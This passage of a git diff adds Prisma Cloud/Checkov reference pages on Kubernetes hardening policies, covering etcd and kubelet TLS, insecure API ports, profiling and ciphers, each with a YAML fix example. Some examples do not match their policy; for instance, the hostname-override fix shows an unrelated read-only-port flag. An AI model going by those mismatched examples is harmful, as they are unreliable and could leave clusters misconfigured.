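The provider requirement above can be sketched as a simple audit: accept an `EncryptionConfiguration` only when it lists one of the appropriate providers. The file content below is illustrative; in a real cluster the file to inspect is whatever the apiserver's `--encryption-provider-config` flag points at, and a robust check would parse the YAML rather than grep it.

```shell
# Sketch: pass only if an approved provider (aescbc, kms, secretbox) appears.
cfg=$(mktemp)
cat > "$cfg" <<'EOF'
apiVersion: apiserver.config.k8s.io/v1
kind: EncryptionConfiguration
resources:
- resources:
  - secrets
  providers:
  - aescbc:
      keys:
      - name: key1
        secret: PGJhc2U2NCBrZXk+
  - identity: {}
EOF
if grep -Eq '(aescbc|kms|secretbox):' "$cfg"; then
  result=PASS   # an appropriate provider is configured
else
  result=FAIL   # only weak or identity providers found
fi
echo "$result"
rm -f "$cfg"
```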
+ +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-apiserver + tier: control-plane + name: kube-apiserver + namespace: kube-system +spec: + containers: + - command: ++ - kube-apiserver ++ - --encryption-provider-config=config.file + image: gcr.io/google_containers/kube-apiserver-amd64:v1.6.0 + livenessProbe: + failureThreshold: 8 + httpGet: + host: 127.0.0.1 + path: /healthz + port: 6443 + scheme: HTTPS + initialDelaySeconds: 15 + timeoutSeconds: 15 + name: kube-apiserver + resources: + requests: + cpu: 250m + volumeMounts: + - mountPath: /etc/kubernetes/ + name: k8s + readOnly: true + - mountPath: /etc/ssl/certs + name: certs + - mountPath: /etc/pki + name: pki + hostNetwork: true + volumes: + - hostPath: + path: /etc/kubernetes + name: k8s + - hostPath: + path: /etc/ssl/certs + name: certs + - hostPath: + path: /etc/pki + name: pki ", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-etcd-certfile-and-etcd-keyfile-arguments-are-set-as-appropriate.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-etcd-certfile-and-etcd-keyfile-arguments-are-set-as-appropriate.adoc new file mode 100644 index 000000000..7221d66ec --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-etcd-certfile-and-etcd-keyfile-arguments-are-set-as-appropriate.adoc @@ -0,0 +1,98 @@ +== The --etcd-certfile and --etcd-keyfile arguments are not set appropriately +// '--etcd-certfile' and '--etcd-keyfile' arguments not set appropriately + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 2c41d0d8-f2fa-43a9-80a7-fe5623a728d3 + +|Checkov Check ID +| 
https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py[CKV_K8S_99] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +etcd should be configured to make use of TLS encryption for client connections. +etcd is a highly-available key value store used by Kubernetes deployments for persistent storage of all of its REST API objects. +These objects are sensitive in nature and should be protected by client authentication. +This requires the API server to identify itself to the etcd server using a client certificate and key. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-apiserver + tier: control-plane + name: kube-apiserver + namespace: kube-system +spec: + containers: + - command: + - kube-apiserver + - --etcd-certfile=/path/to/cert + - --etcd-keyfile=/path/to/key + image: gcr.io/google_containers/kube-apiserver-amd64:v1.6.0 + livenessProbe: + failureThreshold: 8 + httpGet: + host: 127.0.0.1 + path: /healthz + port: 6443 + scheme: HTTPS + initialDelaySeconds: 15 + timeoutSeconds: 15 + name: kube-apiserver-should-pass + resources: + requests: + cpu: 250m + volumeMounts: + - mountPath: /etc/kubernetes/ + name: k8s + readOnly: true + - mountPath: /etc/ssl/certs + name: certs + - mountPath: /etc/pki + name: pki + hostNetwork: true + volumes: + - hostPath: + path: /etc/kubernetes + name: k8s + - hostPath: + path: /etc/ssl/certs + name: certs + - hostPath: + path: /etc/pki + name: pki ", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-event-qps-argument-is-set-to-0-or-a-level-which-ensures-appropriate-event-capture.adoc 
b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-event-qps-argument-is-set-to-0-or-a-level-which-ensures-appropriate-event-capture.adoc new file mode 100644 index 000000000..a10b09035 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-event-qps-argument-is-set-to-0-or-a-level-which-ensures-appropriate-event-capture.adoc @@ -0,0 +1,67 @@ +== The --event-qps argument is not set to a level that ensures appropriate event capture +// '--event-qps' argument not set to a level that ensures appropriate event capture + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 8b6e2702-e548-4c22-a41c-0e29662635af + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py[CKV_K8S_147] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Security relevant information should be captured. +The --event-qps flag on the Kubelet can be used to limit the rate at which events are gathered. +Setting this too low could result in relevant events not being logged, however the unlimited setting of 0 could result in a denial of service on the kubelet. +It is important to capture all events and not restrict event creation. +Events are an important source of security information and analytics that ensure that your environment is consistently monitored using the event data. 
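The rule above boils down to reading the kubelet's `--event-qps` value and flagging any configuration that rate-limits event creation (`0` disables the limit). A minimal sketch, where the command line is an invented sample rather than one read from a live node:

```shell
# Sketch: extract --event-qps from a kubelet command line and classify it.
cmdline='kubelet --config=/var/lib/kubelet/config.yaml --event-qps=0'
qps=$(printf '%s\n' "$cmdline" | sed -n 's/.*--event-qps=\([0-9][0-9]*\).*/\1/p')
if [ "$qps" = "0" ]; then
  result=PASS    # event capture is not rate limited
else
  result=REVIEW  # events may be dropped; confirm the cap is acceptable
fi
echo "$result"
```

On a running node the command line could come from `ps` output or the kubelet's systemd unit instead of a hard-coded string.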
+ +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kubelet + tier: control-plane + name: kubelet + namespace: kube-system +spec: + containers: + - command: ++ - kubelet ++ - --event-qps=2 + image: gcr.io/google_containers/kubelet-amd64:v1.6.0 + ...", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-hostname-override-argument-is-not-set.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-hostname-override-argument-is-not-set.adoc new file mode 100644 index 000000000..4f5677e46 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-hostname-override-argument-is-not-set.adoc @@ -0,0 +1,98 @@ +== The --hostname-override argument is set +// '--hostname-override' argument is set + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 882e2ea6-5b70-4ae4-9ddb-112f4dc3f873 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py[CKV_K8S_146] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Do not override node hostnames. +Overriding hostnames could potentially break TLS setup between the kubelet and the apiserver. +Additionally, with overridden hostnames, it becomes increasingly difficult to associate logs with a particular node and process them for security analytics. +Hence, you should set up your kubelet nodes with resolvable FQDNs and avoid overriding the hostnames with IPs.
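Because this check is about the mere presence of a flag, it can be sketched in a few lines of shell. The sample command line is invented for the example:

```shell
# Sketch: fail when a kubelet invocation overrides the node hostname.
cmdline='kubelet --config=/var/lib/kubelet/config.yaml --hostname-override=10.0.0.5'
case "$cmdline" in
  *--hostname-override*) result=FAIL ;;  # hostname is overridden (here, with an IP)
  *) result=PASS ;;                      # node keeps its resolvable FQDN
esac
echo "$result"
```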
+ +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kubelet + tier: control-plane + name: kubelet + namespace: kube-system +spec: + containers: + - command: + - kubelet + - --read-only-port=80 + image: gcr.io/google_containers/kubelet-amd64:v1.6.0 + livenessProbe: + failureThreshold: 8 + httpGet: + host: 127.0.0.1 + path: /healthz + port: 6443 + scheme: HTTPS + initialDelaySeconds: 15 + timeoutSeconds: 15 + name: kubelet + resources: + requests: + cpu: 250m + volumeMounts: + - mountPath: /etc/kubernetes/ + name: k8s + readOnly: true + - mountPath: /etc/ssl/certs + name: certs + - mountPath: /etc/pki + name: pki + hostNetwork: true + volumes: + - hostPath: + path: /etc/kubernetes + name: k8s + - hostPath: + path: /etc/ssl/certs + name: certs + - hostPath: + path: /etc/pki + name: pki", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-insecure-bind-address-argument-is-not-set.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-insecure-bind-address-argument-is-not-set.adoc new file mode 100644 index 000000000..26b5358d3 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-insecure-bind-address-argument-is-not-set.adoc @@ -0,0 +1,65 @@ +== The --insecure-bind-address argument is set +// '--insecure-bind-address' argument is set + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| ff60f8b9-d509-4765-98ef-44ceb1a85f5e + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py[CKV_K8S_86] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Do not bind the insecure API service. 
+If you bind the apiserver to an insecure address, anyone who can connect to it over the insecure port would have unauthenticated and unencrypted access to your master node. +The apiserver does not perform any authentication checking for insecure binds, and traffic to the insecure API port is not encrypted, allowing attackers to potentially read sensitive data in transit. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-apiserver + tier: control-plane + name: kube-apiserver + namespace: kube-system +spec: + containers: + - command: ++ - kube-apiserver ++ - --bind-address=192.168.1.1 + image: gcr.io/google_containers/kube-apiserver-amd64:v1.6.0 + ...", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-insecure-port-argument-is-set-to-0.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-insecure-port-argument-is-set-to-0.adoc new file mode 100644 index 000000000..5889a95bb --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-insecure-port-argument-is-set-to-0.adoc @@ -0,0 +1,65 @@ +== The --insecure-port argument is not set to 0 +// '--insecure-port' argument not set to 0 + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 2536bc15-b47e-4ec7-a215-1193012cb39c + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py[CKV_K8S_88] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Do not bind to an insecure port. +Setting up the apiserver to serve on an insecure port would allow unauthenticated and unencrypted access to your master node.
+This would allow attackers who can access this port to easily take control of the cluster. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-apiserver + tier: control-plane + name: kube-apiserver + namespace: kube-system +spec: + containers: + - command: ++ - kube-apiserver ++ - --insecure-port=0 + image: gcr.io/google_containers/kube-apiserver-amd64:v1.6.0 + ...", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-kubelet-certificate-authority-argument-is-set-as-appropriate.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-kubelet-certificate-authority-argument-is-set-as-appropriate.adoc new file mode 100644 index 000000000..0ca9f9013 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-kubelet-certificate-authority-argument-is-set-as-appropriate.adoc @@ -0,0 +1,65 @@ +== The --kubelet-certificate-authority argument is not set appropriately +// '--kubelet-certificate-authority' argument not set appropriately + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 524428c1-2e12-442b-a0b7-3fd6a454b27b + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py[CKV_K8S_73] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Verify kubelet's certificate before establishing connection. The connections from the apiserver to the kubelet are used for fetching logs for pods, attaching (through kubectl) to running pods, and using the kubelet's port-forwarding functionality. +These connections terminate at the kubelet's HTTPS endpoint.
+By default, the apiserver does not verify the kubelet's serving certificate, which makes the connection subject to man-in-the-middle attacks, and unsafe to run over untrusted and/or public networks. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-apiserver + tier: control-plane + name: kube-apiserver + namespace: kube-system +spec: + containers: + - command: ++ - kube-apiserver ++ - --kubelet-certificate-authority=ca.file + image: gcr.io/google_containers/kube-apiserver-amd64:v1.6.0 + ...", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-kubelet-client-certificate-and-kubelet-client-key-arguments-are-set-as-appropriate.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-kubelet-client-certificate-and-kubelet-client-key-arguments-are-set-as-appropriate.adoc new file mode 100644 index 000000000..b29a85bc1 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-kubelet-client-certificate-and-kubelet-client-key-arguments-are-set-as-appropriate.adoc @@ -0,0 +1,67 @@ +== The --kubelet-client-certificate and --kubelet-client-key arguments are not set appropriately +// '--kubelet-client-certificate' and '--kubelet-client-key' arguments not set appropriately + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 8dcdae26-1bd2-4a5b-a6a3-31f49e4581f2 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py[CKV_K8S_72] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Enable certificate based kubelet authentication. 
+The apiserver, by default, does not authenticate itself to the kubelet's HTTPS endpoints. +The requests from the apiserver are treated anonymously. +You should set up certificate-based kubelet authentication to ensure that the apiserver authenticates itself to kubelets when submitting requests. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-apiserver + tier: control-plane + name: kube-apiserver + namespace: kube-system +spec: + containers: + - command: ++ - kube-apiserver ++ - --kubelet-client-certificate=/path/to/cert ++ - --kubelet-client-key=/path/to/key + image: gcr.io/google_containers/kube-apiserver-amd64:v1.6.0 + ...", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-kubelet-https-argument-is-set-to-true.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-kubelet-https-argument-is-set-to-true.adoc new file mode 100644 index 000000000..08a516363 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-kubelet-https-argument-is-set-to-true.adoc @@ -0,0 +1,95 @@ +== The --kubelet-https argument is not set to True +// '--kubelet-https' argument not set to True + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| bcfe78a3-ec11-4484-bfd0-b2c18e5839e7 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py[CKV_K8S_71] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + +//// +Bridgecrew +Prisma Cloud +* The --kubelet-https argument is not set to True* + + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| bcfe78a3-ec11-4484-bfd0-b2c18e5839e7 + +|Checkov Check ID +| 
https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py [CKV_K8S_71] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== +//// + + +=== Description + + +Use https for kubelet connections. +Connections from apiserver to kubelets could potentially carry sensitive data such as secrets and keys. +It is thus important to use in-transit encryption for any communication between the apiserver and kubelets. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-apiserver + tier: control-plane + name: kube-apiserver + namespace: kube-system +spec: + containers: + - command: ++ - kube-apiserver ++ - --kubelet-https=true + image: gcr.io/google_containers/kube-apiserver-amd64:v1.6.0 + ...", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-kubelet-only-makes-use-of-strong-cryptographic-ciphers.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-kubelet-only-makes-use-of-strong-cryptographic-ciphers.adoc new file mode 100644 index 000000000..abaff6bf7 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-kubelet-only-makes-use-of-strong-cryptographic-ciphers.adoc @@ -0,0 +1,95 @@ +== Kubelet does not use strong cryptographic ciphers + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 3e781500-a383-4f1f-afe9-a5a72b13e1aa + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py[CKV_K8S_151] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Ensure that the Kubelet is configured to only use strong 
cryptographic ciphers. +TLS ciphers have had a number of known vulnerabilities and weaknesses, which can reduce the protection provided by them. +By default, Kubernetes supports a number of TLS cipher suites, including some that have security concerns, weakening the protection provided. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-scheduler + tier: control-plane + name: kube-scheduler + namespace: kube-system +spec: + containers: + - command: ++ - kubelet ++ - --tls-cipher-suites=TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256 + image: gcr.io/google_containers/kube-scheduler-amd64:v1.6.0 + livenessProbe: + failureThreshold: 8 + httpGet: + host: 127.0.0.1 + path: /healthz + port: 6443 + scheme: HTTPS + initialDelaySeconds: 15 + timeoutSeconds: 15 + name: kube-scheduler + resources: + requests: + cpu: 250m + volumeMounts: + - mountPath: /etc/kubernetes/ + name: k8s + readOnly: true + - mountPath: /etc/ssl/certs + name: certs + - mountPath: /etc/pki + name: pki + hostNetwork: true + volumes: + - hostPath: + path: /etc/kubernetes + name: k8s + - hostPath: + path: /etc/ssl/certs + name: certs + - hostPath: + path: /etc/pki + name: pki", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-make-iptables-util-chains-argument-is-set-to-true.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-make-iptables-util-chains-argument-is-set-to-true.adoc new file mode 100644 index 000000000..0a5f4ad2f --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-make-iptables-util-chains-argument-is-set-to-true.adoc @@ -0,0 +1,68 @@ +== The --make-iptables-util-chains argument is not set to True +// '--make-iptables-util-chains' argument not set to True + +=== Policy Details + +[width=45%] +[cols="1,1"] 
+|=== +|Prisma Cloud Policy ID +| f85287d7-5df4-4e40-bdb0-ddf4854be1e5 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py[CKV_K8S_145] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Allow Kubelet to manage iptables. +Kubelets can automatically manage the required changes to iptables based on how you choose your networking options for the pods. +It is recommended to let kubelets manage the changes to iptables. +This ensures that the iptables configuration remains in sync with pod networking configuration. +Manually configuring iptables while pod network configuration changes dynamically might hamper communication between pods/containers and with the outside world. +Your iptables rules might end up too restrictive or too open. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kubelet + tier: control-plane + name: kubelet + namespace: kube-system +spec: + containers: + - command: ++ - kubelet ++ - --make-iptables-util-chains=true + image: gcr.io/google_containers/kubelet-amd64:v1.6.0 + ...", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-peer-auto-tls-argument-is-not-set-to-true.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-peer-auto-tls-argument-is-not-set-to-true.adoc new file mode 100644 index 000000000..a0c1dfa3d --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-peer-auto-tls-argument-is-not-set-to-true.adoc @@ -0,0 +1,10 @@ +== The --peer-auto-tls argument is set to True +// '--peer-auto-tls' argument set to True + +=== Description + + +Do not use automatically generated self-signed certificates 
+for TLS connections between peers. +etcd is a highly-available key value store used by Kubernetes deployments for persistent storage of all of its REST API objects. +These objects are sensitive in nature and should be accessible only by authenticated etcd peers in the etcd cluster. +Hence, do not use self-signed certificates for authentication. diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-peer-cert-file-and-peer-key-file-arguments-are-set-as-appropriate.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-peer-cert-file-and-peer-key-file-arguments-are-set-as-appropriate.adoc new file mode 100644 index 000000000..ac148a5d4 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-peer-cert-file-and-peer-key-file-arguments-are-set-as-appropriate.adoc @@ -0,0 +1,65 @@ +== The --peer-cert-file and --peer-key-file arguments are not set appropriately +// '--peer-cert-file' and '--peer-key-file' arguments not set appropriately + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 63d9f60f-584d-4545-aa72-3f176dd1f164 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py[CKV_K8S_119] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +etcd should be configured to make use of TLS encryption for peer connections. +etcd is a highly-available key value store used by Kubernetes deployments for persistent storage of all of its REST API objects. +These objects are sensitive in nature and should be encrypted in transit and also amongst peers in the etcd clusters. 
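The requirement above can be expressed as a small static check over a container's `command` list, similar in spirit to the Checkov check linked in the table. This is an illustrative sketch only, not Prisma Cloud's implementation; the helper names and sample values are hypothetical.

```python
def parse_flags(command):
    """Collect `--flag=value` arguments from a container command list.

    Flags given without `=value` are stored with a value of None.
    """
    flags = {}
    for arg in command:
        if arg.startswith("--"):
            key, _, value = arg.partition("=")
            flags[key] = value or None
    return flags


def etcd_peer_tls_configured(command):
    """Pass only when both peer TLS file arguments are present."""
    flags = parse_flags(command)
    return "--peer-cert-file" in flags and "--peer-key-file" in flags


# Mirrors the buildtime fix for this policy: both arguments set on etcd.
compliant = ["etcd", "--peer-cert-file=file.pem", "--peer-key-file=file.key"]
```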
+ +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-apiserver + tier: control-plane + name: kube-apiserver + namespace: kube-system +spec: + containers: + - command: ++ - etcd ++ - --peer-cert-file=file.pem ++ - --peer-key-file=file.key + image: gcr.io/google_containers/kube-apiserver-amd64:v1.6.0", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-peer-client-cert-auth-argument-is-set-to-true.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-peer-client-cert-auth-argument-is-set-to-true.adoc new file mode 100644 index 000000000..04d707be2 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-peer-client-cert-auth-argument-is-set-to-true.adoc @@ -0,0 +1,63 @@ +== The --peer-client-cert-auth argument is not set to True +// '--peer-client-cert-auth' argument not set to True + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 469a0145-d6dd-4e83-8904-02de65a8b94f + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/PeerClientCertAuthTrue.py[CKV_K8S_121] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +etcd should be configured for peer authentication. +etcd is a highly-available key value store used by Kubernetes deployments for persistent storage of all of its REST API objects. +These objects are sensitive in nature and should be accessible only by authenticated etcd peers in the etcd cluster. 
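A minimal version of this check can be sketched as follows (illustrative only; the actual logic lives in the linked `PeerClientCertAuthTrue` check). Note that the flag must be explicitly `true` — an absent flag leaves peer client-certificate authentication off:

```python
def peer_client_cert_auth_enabled(args):
    """Pass only when --peer-client-cert-auth is explicitly set to true."""
    for arg in args:
        key, _, value = arg.partition("=")
        # Strip quotes so YAML-style quoted args like "--peer-client-cert-auth=true" match.
        if key.strip('"') == "--peer-client-cert-auth":
            return value.strip('"').lower() == "true"
    return False  # flag absent: etcd does not require peer client certs
```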
+ +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + name: etcd + namespace: should-pass +spec: + hostNetwork: true + containers: + - name: "kuku2" + image: "b.gcr.io/kuar/etcd:2.2.0" + args: + ... ++ - "--peer-client-cert-auth=true" + ...", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-profiling-argument-is-set-to-false-1.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-profiling-argument-is-set-to-false-1.adoc new file mode 100644 index 000000000..30ee5deb2 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-profiling-argument-is-set-to-false-1.adoc @@ -0,0 +1,66 @@ +== The --profiling argument is not set to False for scheduler +// '--profiling' argument not set to False for scheduler + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| b954f1ae-9d6d-4d52-a1db-9d54bde1b36d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py[CKV_K8S_114] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Disable profiling, if not needed. +Profiling allows for the identification of specific performance bottlenecks. +It generates a significant amount of program data that could potentially be exploited to uncover system and program details. +If you are not experiencing any bottlenecks and do not need the profiler for troubleshooting purposes, it is recommended to turn it off to reduce the potential attack surface. 
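To illustrate, a buildtime check for this condition can be sketched as a walk over the pod's containers. The helper and the pod fragment below are hypothetical, not the actual Checkov code:

```python
def profiling_disabled(pod):
    """Pass when every container command explicitly sets --profiling=false."""
    containers = pod.get("spec", {}).get("containers", [])
    return all(
        "--profiling=false" in container.get("command", [])
        for container in containers
    )


# Minimal pod fragment matching this policy's buildtime fix.
scheduler_pod = {
    "spec": {
        "containers": [
            {"command": ["kube-scheduler", "--profiling=false"]},
        ]
    }
}
```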
